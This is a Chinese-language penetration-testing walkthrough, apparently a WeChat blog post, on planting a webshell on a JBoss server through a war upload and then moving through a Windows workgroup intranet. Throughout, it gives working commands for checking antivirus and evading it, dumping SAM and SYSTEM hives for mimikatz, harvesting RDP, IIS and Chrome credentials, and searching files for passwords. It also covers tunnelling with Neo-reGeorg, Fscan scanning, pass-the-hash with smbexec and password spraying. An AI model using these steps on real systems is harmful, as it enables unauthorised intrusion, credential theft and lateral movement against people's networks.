Jboss Get Webshell To 工作组渗透

Jboss Get Webshell To 工作组渗透

Jboss获取Webshell

通过Jboss上传war包获取Webshell，进而攻击内网。

参考：http://anyun.org/a/seayxinxianquanboke/2017/0213/7867.html

潜在问题：

•上传Webshell时不知道Web路径？怎么办？访问：

/jmx-console/HtmlAdaptor?action=inspectMBean&name=JMImplementation%3Aservice%3DLoaderRepository%2Cname%3DDefault

上面图后来补的目标为windows, 后台可以上传war包获取Webshell, 也可以用利用Jboss漏洞工具获取。

工作组渗透

通过Webshell，进行内网工作组渗透。

信息搜集：

首先查看权限whoami

查看进程 tasklist /svc去在线网站进行比对，存在杀软，无法上传远控，也无法上传任何工具，mimikatz抓密码不行了，抓浏览器密码什么的都不行，只能用其他方法代替。（虽然不免杀，但是我们可以找其他方法代替，这可能是很多小白也会遇到的问题）

推荐三个在线对比进程的网站。

https://www.ddosi.org/av/1.phphttps://www.adminxe.com/CompareAV/index.phphttp://payloads.net/kill_software/

网络结构判断,收集都有哪些网段 ipconfig 查看很可惜没有域，常规工作组

Route print 查看路由是否有除了192.168.1.1别的网段

Netstat -an 查看都有哪些IP在连接webshell IP, 有可能看到不同网段

hosts文件：C:WindowsSystem32driversetchosts，是否绑定域名。

arp -a 可以看到一些内网的机器

Net session &Net use

查看下当前有没有连接有的话就发了。一般情况下是没有的，但是在域渗透的时候遇到过，可能是别的大佬在搞我捡漏了。

      上面这些操作网对内网的网络已经有了一个大概的了解。接下来对一些敏感文件或者凭证进行搜集.        

抓Hash 后期可以进行hash传递，如果抓到明文进行密码喷洒，由于没有免杀的mimikatz我才用，导出注册表这种形式。这种方式可以不用担心免杀。Procdump.exe+mimikatz也可以，但是有些杀软现在已经开始杀Procdump了。

在终端执行如下两句进行hash导出，下载到本地

reg save hklmsam c:WINDOWSTempsam.hivereg save hklmsystem c:WINDOWSTempsystem.hive

然后用mimikatz读取hash

mimikatz # Privilege::debugmimikatz # lsadump::sam /sam:sam.hive /system:system.hive

、

然后到cmd5.com进行破解

没有会员有点蛋疼。明文暂时没拿到。继续进行信息搜集

查看3389

cmdkey /list

获取Credentials：

dir /a %userprofile%AppDataLocalMicrosoftdir /a %userprofile%AppDataLocalMicrosoftCredentials*  //查看RDP凭证链接3389连接记录reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"

IIS信息可以获取

IIS7、IIS8：      

列出网站列表：%systemroot%/system32/inetsrv/appcmd.exe list site      列出网站物理路径：%systemroot%system32inetsrvappcmd.exe list vdir

或者使用mimikatz读取IIS7配置文件：      

IIS6：      

cscript.exe C:InetpubAdminScriptsadsutil.vbs ENUM W3SVC/1/root

Chorm信息

chrome浏览器默认的用户数据保存目录如下

用户数据目录：C:UsersxxAppDataLocalGoogleChromeUser DataDefault      缓存目录：C:UsersxxAppDataLocalGoogleChromeUser DataDefaultCache      

各文件如下：      

书签：C:UsersxxAppDataLocalGoogleChromeUser DataDefaultBookmarks      Cookie: C:UsersxxAppDataLocalGoogleChromeUser DataDefaultCookies      浏览历史：C:UsersxxAppDataLocalGoogleChromeUser DataDefaultHistory      当前的session：C:UsersxxAppDataLocalGoogleChromeUser DataDefaultCurrent Session      账号密码：C:UsersxxAppDataLocalGoogleChromeUser DataDefaultLogin Data               C:UsersxxAppDataLocalGoogleChromeUser DataProfileLogin Data

查看回收站: C:/$RECYCLE.BIN/  ，以上翻遍了没找到太多有用的信息

搜索敏感文件

dir /b /s *user*.*,pass.*,config.*  //只搜集当前目录和子目录

不要直接从c盘根目录找，那样文件会很多，建议从 User 目录下：（具体可以更具情况追加）

findstr 命令查找某个文件的某个字段

上面两条命令只是查找某个文件，那我们想要查找一个文件里有没有 user、pass 等字段内容，就可以使用这条命令

findstr /c:"user" /c:"pass" /si *.txt

通过命令进行敏感文件搜索发现了tomcat的密码

搜集信息很重要不要上来就直接去扫描端口啊什么的，搞不好就被发现了

隧道搭建渗透：

由于没有任何免杀工具，我选择代理网络到本地进行渗透，搭建隧道FRP就别想了被杀。我选择web socks，使用Neo-reGeorg搭建，使用很简单上传对应的脚本jsp的，然后在本地执行python进行把流量代理到本地。

Python neoreg.py -k hacker -u http://127.0.0.1:18080/tunnel.jsp -p 2324

Python neoreg.py -k 密码 -u URL -p 本地socks端口

这样web socks就搭建好了.

这时候需要使用proxifier进行配置socks代理

这样我们就可以在本地访问目标内网了。当然你也可以在kali下用proxychains进行代理,使用很简单后面会在msf部分进行简单讲解。

首先我做的是进行端口扫描。Fscan扫一下内网资产

Fscan -h 192.168.1.1/24  -socks5 127.0.0.1:2324

开放了很多端口，还有两个弱口令

对这些IP对应的端口进行访问，发现192.168.1.221同样存在jboss直觉告诉我也可以上传webshell,可惜需要登录无法获取web目录，导致无法上传webshell，后来用第一个webshell的web路径进行上传成功，原来这俩机器的配置一样。

使用impack尝试hash注入其他win机器没有成功

Proxychain smbexec.py

使用kail的msf尝试ms17-010也没有成功。

使用获取到的3个密码喷洒，成功测试到tomcat密码也是192.168.1.222的mysql密码，通过查看可以发现一些IP和机器名。

后续就是反复前面几个步骤继续收集信息192.168.1.221,33,37机器上的的敏感信息。由于时间原因我就没有继续了，如果继续我相信是会拿到更多权限的，一篇入门文章希望对您有所帮助。

  2023零基础白帽+中级进阶渗透学习路线

知识星球

微信群：feigegehacker

想成为凯文·米特尼克一模一样的

黑客教父？不存在的

想成为透透之神？醒吧

看了无数入门视频，依然搞不到Shell

不如看《安全帮Live》

原文始发于微信公众号（安全帮Live）：Jboss Get Webshell To 工作组渗透